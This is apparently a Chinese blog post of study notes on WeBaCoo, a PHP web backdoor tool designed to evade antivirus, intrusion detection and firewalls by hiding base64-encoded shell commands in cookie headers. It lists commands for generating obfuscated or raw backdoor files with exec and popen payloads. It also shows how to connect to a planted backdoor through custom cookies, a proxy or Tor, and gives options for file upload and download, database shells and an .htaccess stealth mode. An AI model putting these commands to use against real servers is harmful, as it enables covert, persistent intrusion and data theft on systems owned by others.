PHP WeBaCoo后门学习笔记

PHP WeBaCoo后门学习笔记 - PHP WeBaCoo backdoor learning notes

  WeBaCoo (Web Backdoor Cookie) 是一款隐蔽的脚本类Web后门工具。设计理念是躲避AV、NIDS、IPS、网络防火墙和应用防火墙的查杀,提供混淆和原始两种后门代码(原始代码较难检测)。WebBaCoo 使用HTTP响应头传送命令执行的结果,Shell命令经过Base64编码后隐藏在Cookie头中。

安装:

官网:http://sbechtsoudis.com/archiive/webacoo/index.html

kali linux下默认位于:/usr/bin 目录下

使用git安装:git clone git://github.com/anestisb/WeBaCoo.git

 

常见使用方法:

生成模式(后门生成):

1、使用默认配置生成模糊后门代码:

webacoo -g -o backdoor.php #backdoor.php为自定义后门文件名

2、使用exec有效载荷生成混淆后门代码:

webacoo -g -o backdoor.php -f 3  #backdoor.php为自定义后门文件名 3表示exec方法

3、使用popen有效载荷生成原始后门代码:

webacoo -g -o backdoor.php -f 5 -r #backdoor为自定义后门文件名 5表示popen方法

终端模式(后门利用):

1、使用默认配置访问服务器:

webacoo -t -u http://xxx/backdoor.php #-u 后门路径

2、使用“Cookie-name”作为Cookie名称、“TtT”作为分隔符访问服务器:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" #Cookie-name 与 TtT 为自定义内容

3、使用一般代理:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p XX.XX.XX.XX:XXXX #Cookie-name 与 TtT 为自定义内容 XX替换为相应的ip和端口号

4,使用tor代理:

webacoo -t -u http://xxx/backdoor.php -c "Cookie-name" -d "TtT" -p tor #Cookie-name 与 TtT 为自定义内容

参数解释:

-f FUNCTION :使用PHP系统函数 system、shell_exec、exec、passthru、popen ,按顺序FUNCTION分别为数字1、2、3、4、5

-g:生成后门

-o:指定生成的后门文件名

-u URL:后门路径

-e CMD:单独命令执行模式 需要添加 -t 和 -u参数

-m METHOD:选择HTTP请求方式,默认为GET

-c COOKIE:Cookie的名字,默认为:M-cookie

-d DELIM:指定分隔符 默认为随机

-p PROXY:使用代理

-v LEVEL:打印的详细程度。默认0 无附加信息,1打印HTTP头,2打印HTTP头和数据

-h:显示帮助文件并退出

-update:更新

mysql-cli:MySQL命令行模式

psql-cli:Postgres命令行模式

upload 使用POST上传文件

download:下载文件

stealth:通过.htaccess 处理增加的隐形模块

posted @   我超怕的  阅读(1425)  评论(0编辑  收藏  举报
编辑推荐:
· 记一次.NET内存居高不下排查解决与启示
· 探究高空视频全景AR技术的实现原理
· 理解Rust引用及其生命周期标识(上)
· 浏览器原生「磁吸」效果!Anchor Positioning 锚点定位神器解析
· 没有源码,如何修改代码逻辑?
阅读排行:
· 全程不用写代码,我用AI程序员写了一个飞机大战
· DeepSeek 开源周回顾「GitHub 热点速览」
· 记一次.NET内存居高不下排查解决与启示
· MongoDB 8.0这个新功能碉堡了,比商业数据库还牛
· .NET10 - 预览版1新功能体验(一)
点击右上角即可分享
微信分享提示